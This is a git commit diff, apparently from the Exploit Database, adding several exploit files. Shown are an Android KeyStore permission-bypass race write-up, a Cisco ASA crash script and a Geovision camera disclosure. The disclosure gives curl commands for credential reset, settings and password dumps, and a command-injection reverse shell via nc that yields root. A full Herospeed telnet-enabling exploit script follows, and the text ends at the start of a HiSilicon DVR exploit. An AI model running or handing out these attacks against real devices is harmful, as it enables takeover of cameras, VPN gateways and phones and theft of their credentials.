DB: 2018-02-08
25 changes to exploits/shellcodes QNAP NAS Devices - Heap Overflow QNAP NVR/NAS - Buffer Overflow (PoC) QNAP NVR/NAS Devices - Buffer Overflow (PoC) Cisco ASA - Crash PoC Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption Android - 'getpidcon' Permission Bypass in KeyStore Service Multiple OEM - 'nsd' Remote Stack Format String (PoC) HP-UX 11.0 - pppd Stack Buffer Overflow HP-UX 11.0 - 'pppd' Local Stack Buffer Overflow SGI IRIX - 'LsD' Multiple Buffer Overflows SGI IRIX - 'LsD' Multiple Local Buffer Overflows PostScript Utilities - 'psnup' Argument Buffer Overflow PostScript Utilities - 'psnup' Local Buffer Overflow Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflows Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Local Buffer Overflows MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access Geovision Inc. IP Camera & Video - Remote Command Execution Axis SSI - Remote Command Execution / Read Files Axis Communications MPQT/PACS - Heap Overflow / Information Leakage Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD Uniview - Remote Command Execution / Export Config (PoC) Vitek - Remote Command Execution / Information Disclosure (PoC) Vivotek IP Cameras - Remote Stack Overflow (PoC) Dahua Generation 2/3 - Backdoor Access HiSilicon DVR Devices - Remote Code Execution JiRos Banner Experience 1.0 - Unauthorised Create Admin JiRos Banner Experience 1.0 - Unauthorized Create Admin Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting Naukri Clone Script - Persistent Cross-Site Scripting Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting Online Test Script 2.0.7 - 'cid' SQL Injection Entrepreneur Dating Script 2.0.2 - Authentication Bypass
This commit is contained in:
parent
2b72bb6e36
commit
2c4b08963a
24 changed files with 3668 additions and 7 deletions
63
exploits/android/dos/43996.txt
Normal file
63
exploits/android/dos/43996.txt
Normal file
|
@ -0,0 +1,63 @@
|
|||
The keystore binder service ("android.security.IKeystoreService") allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many SELinux contexts, including application contexts, but also unprivileged daemons such as "media.codec".
|
||||
|
||||
Binder calls to this service are unpacked by IKeyStoreService (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/IKeystoreService.cpp), and are then passed on to be processed by KeyStoreService. The "generateKey" command is handled by "KeyStoreService::generateKey" (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/key_store_service.cpp#691). Here is a snippet from this function:
|
||||
|
||||
1. KeyStoreServiceReturnCode KeyStoreService::generateKey(const String16& name,
|
||||
2. const hidl_vec<KeyParameter>& params,
|
||||
3. const hidl_vec<uint8_t>& entropy, int uid,
|
||||
4. int flags,
|
||||
5. KeyCharacteristics* outCharacteristics) {
|
||||
6. uid = getEffectiveUid(uid);
|
||||
7. KeyStoreServiceReturnCode rc =
|
||||
8. checkBinderPermissionAndKeystoreState(P_INSERT, uid, flags & KEYSTORE_FLAG_ENCRYPTED);
|
||||
9. if (!rc.isOk()) {
|
||||
10. return rc;
|
||||
11. }
|
||||
12. if ((flags & KEYSTORE_FLAG_CRITICAL_TO_DEVICE_ENCRYPTION) && get_app_id(uid) != AID_SYSTEM) {
|
||||
13. ALOGE("Non-system uid %d cannot set FLAG_CRITICAL_TO_DEVICE_ENCRYPTION", uid);
|
||||
14. return ResponseCode::PERMISSION_DENIED;
|
||||
15. }
|
||||
16.
|
||||
17. if (containsTag(params, Tag::INCLUDE_UNIQUE_ID)) {
|
||||
18. if (!checkBinderPermission(P_GEN_UNIQUE_ID)) return ResponseCode::PERMISSION_DENIED;
|
||||
19. }
|
||||
20. ...
|
||||
21. }
|
||||
|
||||
Like most KeyStore calls, this method uses "KeyStoreService::checkBinderPermission" in order to validate the calling process's permissions. This function uses a twofold approach to verify the caller (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/key_store_service.cpp#checkBinderPermission):
|
||||
|
||||
1. The caller's UID is retrieved using IPCThreadState::self()->getCallingUid() and compared against an array of pre-populated UIDs and permissions ("user_perms")
|
||||
1.1 If the UID matches any in the array, its permission set is retrieved from the array
|
||||
1.2 If the UID isn't in the array, the default permission set is used ("DEFAULT_PERMS")
|
||||
2. The caller's SELinux context is retrieved using getpidcon(...) using the PID from the binder transaction (IPCThreadState::self()->getCallingPid())
|
||||
2.1 An SELinux access check is performed for the given context and operation
|
||||
|
||||
Specifically to our case, if a "generateKey" command is called with a "INCLUDE_UNIQUE_ID" tag, the KeyStore will use an attestation certificate for the generated key with an application-scoped and time-bounded device-unique ID. Since creating attestation keys is a privileged operation, it should not be carried out by any user.
|
||||
|
||||
This restriction is enforced using the SELinux context enforcement alone -- the "default" permission set ("DEFAULT_PERMS") contains the aforementioned permission:
|
||||
|
||||
static const perm_t DEFAULT_PERMS = static_cast<perm_t>(
|
||||
P_GET_STATE | P_GET | P_INSERT | P_DELETE | P_EXIST | P_LIST | P_SIGN | P_VERIFY |
|
||||
P_GEN_UNIQUE_ID /* Only privileged apps can do this, but enforcement is done by SELinux */);
|
||||
|
||||
As noted in the comment above, this API is restricted to "priv_app" SELinux contexts, which is enforced using validation #2 above.
|
||||
|
||||
However, using the calling PID in order to enforce access controls in binder calls is an invalid approach. This is since the calling PID can transition from zombie to dead, allowing other PIDs to take its place. Therefore, the following attack flow is possible:
|
||||
|
||||
1. Process A forks and creates process B
|
||||
2. Process A cycles pids until it reaches the pid before its own
|
||||
3. Process B issues a binder transaction for the KeyStore service, containing an INCLUDE_UNIQUE_ID tag
|
||||
4. Process A kills process B, allowing it to transition to dead
|
||||
5. Process A spawns a new "priv_app" instance, occupying process B's PID
|
||||
|
||||
If points 4-5 are completed before the KeyStore service performs the "getpidcon" call, the permission check will use the new app's SELinux context, allowing the access control checks to pass. Otherwise, since no ill effects happen if the race fails, an attacker can continue issuing calls until the race succeeds.
|
||||
|
||||
As for spawning a new "priv_app" instance, this can be achieved by issuing a query request to a content provider published by a "priv_app". Many such providers exist (the contacts provider, telephony provider, settings provider, etc.). In this case, I chose to use the "calendar" provider, as it was not running on the device to begin with (and is therefore had to be spawned in order to handle the query request).
|
||||
|
||||
In order to expand the timing window for the PoC, I've added a "sleep" call to the KeyStore service's "generateKey" call. You can find the patch under "keystore.diff".
|
||||
|
||||
After applying the patch, the attached PoC should be built as part of the Android source tree, by extracting the source files into "frameworks/native/cmds/keystorerace", and running a build (e.g., "mmm keystorerace"). The resulting binary ("keystorerace") contains the PoC code. Running it should result in a new device-unique key being generated, despite not being executed from a "priv_app".
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43996.zip
|
35
exploits/hardware/dos/43986.py
Executable file
35
exploits/hardware/dos/43986.py
Executable file
|
@ -0,0 +1,35 @@
|
|||
#
|
||||
# Cisco ASA CVE-2018-0101 Crash PoC
|
||||
#
|
||||
# We basically just read:
|
||||
# https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf
|
||||
#
|
||||
# @zerosum0x0, @jennamagius, @aleph___naught
|
||||
#
|
||||
|
||||
import requests, sys
|
||||
|
||||
headers = {}
|
||||
headers['User-Agent'] = 'Open AnyConnect VPN Agent
|
||||
v7.08-265-gae481214-dirty'
|
||||
headers['Content-Type'] = 'application/x-www-form-urlencoded'
|
||||
headers['X-Aggregate-Auth'] = '1'
|
||||
headers['X-Transcend-Version'] = '1'
|
||||
headers['Accept-Encoding'] = 'identity'
|
||||
headers['Accept'] = '*/*'
|
||||
headers['X-AnyConnect-Platform'] = 'linux-64'
|
||||
headers['X-Support-HTTP-Auth'] = 'false'
|
||||
headers['X-Pad'] = '0000000000000000000000000000000000000000'
|
||||
|
||||
xml = """<?xml version="1.0" encoding="UTF-8"?>
|
||||
<config-auth client="a" type="a" aggregate-auth-version="a">
|
||||
<host-scan-reply>A</host-scan-reply>
|
||||
</config-auth>
|
||||
"""
|
||||
|
||||
r = requests.post(sys.argv[1], data = xml, headers = headers, verify=False,
|
||||
allow_redirects=False)
|
||||
|
||||
print(r.status_code)
|
||||
print(r.headers)
|
||||
print(r.text)
|
244
exploits/hardware/remote/43982.txt
Normal file
244
exploits/hardware/remote/43982.txt
Normal file
|
@ -0,0 +1,244 @@
|
|||
[STX]
|
||||
|
||||
Subject: Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access
|
||||
|
||||
Attack vector: Remote
|
||||
Authentication: Anonymous (no credentials needed)
|
||||
Researcher: bashis <mcw noemail eu> (November 2017)
|
||||
PoC: https://github.com/mcw0/PoC
|
||||
Python PoC: https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
|
||||
Release date: February 1, 2018
|
||||
Full Disclosure: 90 days
|
||||
|
||||
Vendor URL: http://www.geovision.com.tw/
|
||||
Updated FW: http://www.geovision.com.tw/download/product/
|
||||
|
||||
heap: Executable + Non-ASLR
|
||||
stack: Executable + ASLR
|
||||
|
||||
Vulnerable:
|
||||
Practically more or less all models and versions with FW before November/December 2017 of Geovision embedded IP devices suffer from one or more of these vulnerabilities.
|
||||
|
||||
Verified:
|
||||
GV-BX1500 v3.10 2016-12-02
|
||||
GV-MFD1501 v3.12 2017-06-19
|
||||
|
||||
Timeline:
|
||||
November 5, 2017: Initiated contact with Geovision
|
||||
November 6, 2017: Response from Geovision
|
||||
November 8, 2017: Informed Geovision about quite dangerous bug in 'FilterSetting.cgi'
|
||||
November 8, 2017: Responce from Geovision
|
||||
November 15, 2017: Reached out to Geovision to offer more time until FD
|
||||
(due to the easy exploiting and number of vulnerabilities in large number of products)
|
||||
November 17, 2017: Request from Geovision to have time to end of January 2018
|
||||
November 18, 2017: Agreed to FD date of February 1, 2018
|
||||
November 20, 2017: Received one image for test purposes
|
||||
November 26, 2017: ACK to Geovision that image looks good
|
||||
January 16, 2018: Sent this FD and PoC Python to Geovision for comments before FD, if any objections.
|
||||
January 17, 2018: Received all OK from Geovision, no objections, toghether with thanks for the effort for trying to make Geovision products more safe.
|
||||
January 17, 2018: Thanked Geoviosion for good cooperation.
|
||||
February 1, 2018: Full disclosure
|
||||
|
||||
|
||||
-[Unathorized Access]-
|
||||
|
||||
1)
|
||||
PoC: Reset and change 'admin' to 'root' with passwd 'PWN' (GV-MFD1501 v3.12 2017-06-19)
|
||||
curl -v http://192.168.57.20:80/UserCreat.cgi?admin_username=root\&admin_passwordNew=PWN
|
||||
|
||||
2)
|
||||
PoC: Change device WebGUI language back to default
|
||||
curl -v -X POST http://192.168.57.20:80/LangSetting.cgi -d lang_type=0\&submit=Apply
|
||||
|
||||
3)
|
||||
Unathorized upgrade of firmware.
|
||||
PoC: Reboot the remote device as in 'run_upgrade_prepare'
|
||||
curl -v "http://192.168.57.20:80/geo-cgi/sdk_fw_update.cgi"
|
||||
URI: http://192.168.57.20/ssi.cgi/FirmwareUpdate.htm
|
||||
|
||||
4)
|
||||
PoC: Upload of Firmware header for checking correct firmware.
|
||||
curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_fw_check.cgi" -d "BAAAALAAAAABAgAAAAAAADKvfBIAAAABGDIpBwAAAABhc19jcmZpZAAAAAAAAAAALgYAALAAAADXe///AAAAAAAAAABib290bG9hZGVyLmJpbgAAAAA0ALAAAgBOAP//AAAAAAAAAAB1SW1hZ2UAAAAAAAAAAAAA1OIaALAANgDSw///AAAAAAAAAAByYW1kaXNrLmd6AAAAAAAAALBtArAAUgAIuf//AAAAAAAAAAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjozMDUNCkhJRDoxMTc2LE5hbWU6R1YtQlgzNDAwRSxEb3duVmVyOjMwMw0KSElEOjExNzUsTmFtZTpHVi1CWDE1MDBFLERvd25WZXI6MzAzDQpISUQ6MTEwMSxOYW1lOkdWLVVORkUyNTAzLERvd25WZXI6MzA2DQpISUQ6MTE0NSxOYW1lOkdWLVVOMjYwMCxEb3c="
|
||||
|
||||
/var/log/messages
|
||||
192.168.57.1 - - [01/Jan/1970:00:32:43 +0000] "PUT /geo-cgi/sdk_fw_check.cgi HTTP/1.1" 200 25000 "" "curl/7.38.0"
|
||||
Nov 5 17:11:51 thttpd[1576]: (1576) cgi[3734]: Spawned CGI process 1802 to run 'geo-cgi/sdk_fw_check.cgi', query[]
|
||||
Nov 5 17:11:51 sdk_fw_check.cgi: CONTENT_LENGTH = 684
|
||||
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[183]: base64 encode length : 684
|
||||
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[184]: base64 encode output : BAAAALAAAAABAgAAAAAAADKvfBIAAAABGDIpBwAAAABhc19jcmZpZAAAAAAAAAAALgYAALAAAADXe///AAAAAAAAAABib290bG9hZGVyLmJpbgAAAAA0ALAAAgBOAP//AAAAAAAAAAB1SW1hZ2UAAAAAAAAAAAAA1OIaALAANgDSw///AAAAAAAAAAByYW1kaXNrLmd6AAAAAAAAALBtArAAUgAIuf//AAAAAAAAAAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjoz
|
||||
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[185]: decode length : 512
|
||||
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[186]: decode output : ^D
|
||||
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) check_image_format_is_OK[839]: (1) Product Error: Image's magic[513] != DEV_MAGIC[1000]
|
||||
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) check_firmware[135]: ERROR : check firmware, length [512]
|
||||
|
||||
5)
|
||||
Unathorized access of 'sdk_config_set.cgi' to Import Setting (SDK_CONFIG_SET)
|
||||
curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_config_set.cgi"
|
||||
|
||||
6)
|
||||
/PSIA/
|
||||
Access to GET (read) and PUT (write)
|
||||
curl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot
|
||||
curl -v -X PUT http://192.168.57.20:80/PSIA/System/updateFirmware
|
||||
curl -v -X PUT http://192.168.57.20:80/PSIA/System/factoryReset
|
||||
[...]
|
||||
List: /PSIA/System/reboot/index
|
||||
Usage: /PSIA/System/reboot/description
|
||||
PoC: curl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot
|
||||
Full recursive list: /PSIA/indexr
|
||||
|
||||
|
||||
-[Remote Command Execution]-
|
||||
|
||||
7)
|
||||
PoC will create 'tmp/Login.cgi' with '<!--#include file="SYS_CFG"-->', then Dump All Settings,
|
||||
including login and passwords in clear text by accessing the created Login.htm
|
||||
|
||||
curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION&password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&data_type=1&attachment=1&channel=1&secret=1&key=PWNED" ; curl -v "http://192.168.57.20:80/ssi.cgi/tmp/Login.htm"
|
||||
|
||||
< HTTP/1.1 200 OK
|
||||
...
|
||||
-------------------------------------
|
||||
- -
|
||||
- Dump All Settings -
|
||||
- -
|
||||
-------------------------------------
|
||||
...
|
||||
|
||||
|
||||
8)
|
||||
PoC will pop reverse connect back shell to 192.168.57.1
|
||||
|
||||
/www/PictureCatch.cgi
|
||||
curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\&data_type=1\&attachment=1\&channel=1\&secret=1\&key=PWNED"
|
||||
|
||||
$ ncat -vlp 1337
|
||||
Ncat: Version 7.12 ( https://nmap.org/ncat )
|
||||
Ncat: Listening on :::1337
|
||||
Ncat: Listening on 0.0.0.0:1337
|
||||
Ncat: Connection from 192.168.57.20.
|
||||
Ncat: Connection from 192.168.57.20:55331.
|
||||
pwd
|
||||
/www
|
||||
id
|
||||
uid=0(root) gid=0(root)
|
||||
exit
|
||||
$
|
||||
|
||||
9)
|
||||
/www/JpegStream.cgi
|
||||
curl -v "http://192.168.57.20:80/JpegStream.cgi?username=GEOVISION\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\&data_type=1\&attachment=1\&channel=1\&secret=1\&key=PWNED"
|
||||
|
||||
$ ncat -vlp 1337
|
||||
Ncat: Version 7.12 ( https://nmap.org/ncat )
|
||||
Ncat: Listening on :::1337
|
||||
Ncat: Listening on 0.0.0.0:1337
|
||||
Ncat: Connection from 192.168.57.20.
|
||||
Ncat: Connection from 192.168.57.20:55332.
|
||||
pwd
|
||||
/www
|
||||
id
|
||||
uid=0(root) gid=0(root)
|
||||
exit
|
||||
$
|
||||
|
||||
Problem(s):
|
||||
SIiUTIL_GetDecryptData calling popen() "sh -c /var/www/testbf d PWNED ;mkfifo /tmp/s0;..." without proper sanitation of user input
|
||||
|
||||
Note:
|
||||
Vulnerable tags: 'username', 'password' and 'key'
|
||||
|
||||
|
||||
-[Double free]-
|
||||
|
||||
10)
|
||||
curl -v http://192.168.57.20:80/PSIA/System/configurationData
|
||||
*** glibc detected *** psia.cgi: double free or corruption (out): 0x00077d10 ***
|
||||
|
||||
-[Stack Overflow]-
|
||||
|
||||
11)
|
||||
/usr/local/thttpd
|
||||
curl -v "http://192.168.57.20:80/htpasswd?password=`for((i=0;i<140;i++));do echo -en "X";done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII"
|
||||
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
0x49494948 in ?? ()
|
||||
(gdb) bt
|
||||
#0 0x49494948 in ?? ()
|
||||
#1 0x0003889c in ?? ()
|
||||
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
|
||||
(gdb) i reg
|
||||
r0 0x0 0
|
||||
r1 0x369650 3577424
|
||||
r2 0x1 1
|
||||
r3 0x68 104
|
||||
r4 0x41414141 1094795585
|
||||
r5 0x42424242 1111638594
|
||||
r6 0x43434343 1128481603
|
||||
r7 0x44444444 1145324612
|
||||
r8 0x45454545 1162167621
|
||||
r9 0x46464646 1179010630
|
||||
r10 0x47474747 1195853639
|
||||
r11 0x48484848 1212696648
|
||||
r12 0x3680e8 3571944
|
||||
sp 0x7ee0fbc8 0x7ee0fbc8
|
||||
lr 0x3889c 231580
|
||||
pc 0x49494948 0x49494948
|
||||
cpsr 0x20000030 536870960
|
||||
(gdb)
|
||||
|
||||
12)
|
||||
/usr/local/thttpd
|
||||
curl -v http://192.168.57.20:80/geo-cgi/param.cgi?skey=`for((i=0;i<44;i++)); do echo -en "X"; done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN
|
||||
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
0x49494948 in ?? ()
|
||||
(gdb) bt
|
||||
#0 0x49494948 in ?? ()
|
||||
#1 0x3e4c4d54 in ?? ()
|
||||
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
|
||||
(gdb) i reg
|
||||
r0 0xffffffff 4294967295
|
||||
r1 0x7e963e8c 2123775628
|
||||
r2 0x0 0
|
||||
r3 0x242 578
|
||||
r4 0x41414141 1094795585
|
||||
r5 0x42424242 1111638594
|
||||
r6 0x43434343 1128481603
|
||||
r7 0x44444444 1145324612
|
||||
r8 0x45454545 1162167621
|
||||
r9 0x46464646 1179010630
|
||||
r10 0x47474747 1195853639
|
||||
r11 0x48484848 1212696648
|
||||
r12 0xa 10
|
||||
sp 0x7e983c48 0x7e983c48
|
||||
lr 0x3e4c4d54 1045187924
|
||||
pc 0x49494948 0x49494948
|
||||
cpsr 0x60000030 1610612784
|
||||
(gdb)
|
||||
|
||||
13)
|
||||
/www/PictureCatch.cgi
|
||||
curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=`for((i=0;i<324;i++));do echo -en "A";done`BBBB&password=GEOVISION&data_type=1&attachment=1&channel=1&secret=1&key=PWNED"
|
||||
|
||||
[pid 2215] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
|
||||
|
||||
14)
|
||||
/www/Login3gpp.cgi
|
||||
curl -v "http://192.168.57.20:80/Login3gpp.cgi?username=`for((i=0;i<444;i++));do echo -en "A";done`BBBB&password=PWNED"
|
||||
|
||||
[pid 2161] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424243} ---
|
||||
|
||||
15)
|
||||
/www/Login.cgi
|
||||
curl -v "http://192.168.57.20:80/Login.cgi?username=`for((i=0;i<477;i++));do echo -en "A";done`BBBB&password=PWNED"
|
||||
|
||||
[pid 2135] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
|
||||
|
||||
Note: username and password uses strcpy() and both are vulnerable.
|
||||
However, 'password' cannot be used remotely since 'thttpd' checking for this, and is vulnerable for stack overflow.
|
||||
|
||||
Have a nice day
|
||||
/bashis
|
||||
|
||||
[ETX]
|
1090
exploits/hardware/remote/43983.py
Executable file
1090
exploits/hardware/remote/43983.py
Executable file
File diff suppressed because it is too large
Load diff
179
exploits/hardware/remote/43997.py
Executable file
179
exploits/hardware/remote/43997.py
Executable file
|
@ -0,0 +1,179 @@
|
|||
#!/usr/bin/env python2.7
|
||||
#
|
||||
# Herospeed TelnetSwitch daemon running on TCP/787, for allowing enable of the telnetd.
|
||||
# Where one small stack overflow allows us to overwrite the dynamicly generated password and enable telnetd.
|
||||
#
|
||||
# [Verified]
|
||||
# 1) Fullhan IPC FH8830_F22_W_7.1.42.1
|
||||
# 2) Fullhan FH8830_AR0330_FISHEYE_W_7.1.37.5
|
||||
# 3) HiSilicon 3518EV200_OV9732_W_7.1.25.1, 3519V100_IMX274_W_7.1.39.3
|
||||
# 4) Ambarella s2l55m_imx123_W_7.1.25.2, S2E66_IMX178_W_7.1.3.4
|
||||
#
|
||||
# Author: bashis <mcw noemail eu>, 2018
|
||||
#
|
||||
import socket
|
||||
import select
|
||||
import sys
|
||||
import argparse
|
||||
import base64
|
||||
import struct
|
||||
import time
|
||||
#
|
||||
# Validate correctness of HOST, IP and PORT
|
||||
#
|
||||
class Validate:
|
||||
|
||||
def __init__(self,verbose):
|
||||
self.verbose = verbose
|
||||
|
||||
# Check if IP is valid
|
||||
def CheckIP(self,IP):
|
||||
self.IP = IP
|
||||
|
||||
ip = self.IP.split('.')
|
||||
if len(ip) != 4:
|
||||
return False
|
||||
for tmp in ip:
|
||||
if not tmp.isdigit():
|
||||
return False
|
||||
i = int(tmp)
|
||||
if i < 0 or i > 255:
|
||||
return False
|
||||
return True
|
||||
|
||||
# Check if PORT is valid
|
||||
def Port(self,PORT):
|
||||
self.PORT = PORT
|
||||
|
||||
if int(self.PORT) < 1 or int(self.PORT) > 65535:
|
||||
return False
|
||||
else:
|
||||
return True
|
||||
|
||||
# Check if HOST is valid
|
||||
def Host(self,HOST):
|
||||
self.HOST = HOST
|
||||
|
||||
try:
|
||||
# Check valid IP
|
||||
socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
|
||||
# Now we check if it is correct typed IP
|
||||
if self.CheckIP(self.HOST):
|
||||
return self.HOST
|
||||
else:
|
||||
return False
|
||||
except socket.error as e:
|
||||
# Else check valid DNS name, and use the IP address
|
||||
try:
|
||||
self.HOST = socket.gethostbyname(self.HOST)
|
||||
return self.HOST
|
||||
except socket.error as e:
|
||||
return False
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
INFO = '\n[Herospeed TelnetSwitch pwn (2018 bashis <mcw noemail eu>)]\n'
|
||||
rhost = '192.168.57.20' # Default Remote HOST
|
||||
rport = 787 # Default Remote PORT
|
||||
BUFFER_SIZE = 1024
|
||||
|
||||
try:
|
||||
arg_parser = argparse.ArgumentParser(
|
||||
prog=sys.argv[0],
|
||||
description=('[*] '+ INFO +' [*]'))
|
||||
arg_parser.add_argument('--rhost', required=True, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
|
||||
arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ str(rport) +']')
|
||||
args = arg_parser.parse_args()
|
||||
except Exception as e:
|
||||
print INFO,"\nError: {}\n".format(str(e))
|
||||
sys.exit(1)
|
||||
|
||||
print INFO
|
||||
if args.rport:
|
||||
rport = int(args.rport)
|
||||
|
||||
if args.rhost:
|
||||
rhost = args.rhost
|
||||
IP = args.rhost
|
||||
|
||||
# Check if RPORT is valid
|
||||
if not Validate(True).Port(rport):
|
||||
print "[!] Invalid RPORT - Choose between 1 and 65535"
|
||||
sys.exit(1)
|
||||
|
||||
# Check if RHOST is valid IP or FQDN, get IP back
|
||||
rhost = Validate(True).Host(rhost)
|
||||
if not rhost:
|
||||
print "[!] Invalid RHOST"
|
||||
sys.exit(1)
|
||||
|
||||
timeout = 5
|
||||
socket.setdefaulttimeout(timeout)
|
||||
|
||||
#
|
||||
# [Payload]
|
||||
#
|
||||
|
||||
LOGIN = "Lucky787" # Hardcoded login
|
||||
#
|
||||
# Fullhan IPC FH8830_F22_W_7.1.42.1
|
||||
# Fullhan FH8830_AR0330_FISHEYE_W_7.1.37.5
|
||||
#
|
||||
PASSWD = "\n\n\n\n\n\n\n\n\n\n\n\n" # Our new password, must be exactly 12 char, and must be '\n'
|
||||
MESSAGE = ''+ LOGIN + ':' + PASSWD +''
|
||||
BASE64_NULL = "A" * 232 # Decoded as 0x00 with base64 decode
|
||||
HEAP_PWD = 0x00016c8c # Start of the dynamicly generated password, located on heap
|
||||
|
||||
#
|
||||
# HiSilicon 3518EV200_OV9732_W_7.1.25.1
|
||||
#
|
||||
# PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
|
||||
# MESSAGE = ''+ LOGIN + ':' + PASSWD +''
|
||||
# BASE64_NULL = "A" * 364 # Decoded as 0x00 with base64 decode
|
||||
# HEAP_PWD = 0x00016990 # Start of the dynamicly generated password, located on heap
|
||||
|
||||
#
|
||||
# HiSilicon 3519V100_IMX274_W_7.1.39.3
|
||||
#
|
||||
# PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
|
||||
# MESSAGE = ''+ LOGIN + ':' + PASSWD +''
|
||||
# BASE64_NULL = "A" * 364 # Decoded as 0x00 with base64 decode
|
||||
# HEAP_PWD = 0x000267b0 # Start of the dynamicly generated password, located on heap
|
||||
|
||||
#
|
||||
# Ambarella s2l55m_imx123_W_7.1.25.2
|
||||
#
|
||||
# PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
|
||||
# MESSAGE = ''+ LOGIN + ':' + PASSWD +''
|
||||
# BASE64_NULL = "A" * 364 # Decoded as 0x00 with base64 decode
|
||||
# HEAP_PWD = 0x00014c3c # Start of the dynamicly generated password, located on heap
|
||||
|
||||
#
|
||||
# Ambarella S2E66_IMX178_W_7.1.3.4
|
||||
#
|
||||
# PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
|
||||
# MESSAGE = ''+ LOGIN + ':' + PASSWD +''
|
||||
# BASE64_NULL = "A" * 108 # Decoded as 0x00 with base64 decode
|
||||
# HEAP_PWD = 0x00014c68 # Start of the dynamicly generated password, located on heap
|
||||
|
||||
MESSAGE = base64.b64encode(bytes(MESSAGE))
|
||||
MESSAGE += BASE64_NULL
|
||||
|
||||
#
|
||||
# Since the stack overflow writing with only one byte, we need overwrite the password one char at the time (looping twelve times)
|
||||
#
|
||||
for where in range(0, len(PASSWD)):
|
||||
OUT = "GET / HTTP/1.0\nAuthorization: Basic {}{}\n\n".format(MESSAGE,struct.pack('<L',HEAP_PWD)[:3])
|
||||
print "Writing to: {}".format(hex(HEAP_PWD))
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((rhost, rport))
|
||||
s.send(OUT)
|
||||
time.sleep(0.5)
|
||||
response = s.recv(BUFFER_SIZE).split()
|
||||
HEAP_PWD += 0x1 # Next address on heap
|
||||
|
||||
if response[1]:
|
||||
if response[1] == "200":
|
||||
print "({}) OK, telnetd should be open!".format(response[1])
|
||||
break
|
297
exploits/hardware/remote/44004.py
Executable file
297
exploits/hardware/remote/44004.py
Executable file
|
@ -0,0 +1,297 @@
|
|||
#!/usr/bin/env python2
|
||||
#
|
||||
# pwn hisilicon dvr web service
|
||||
#
|
||||
|
||||
from pwn import *
|
||||
from time import sleep
|
||||
import re
|
||||
import argparse
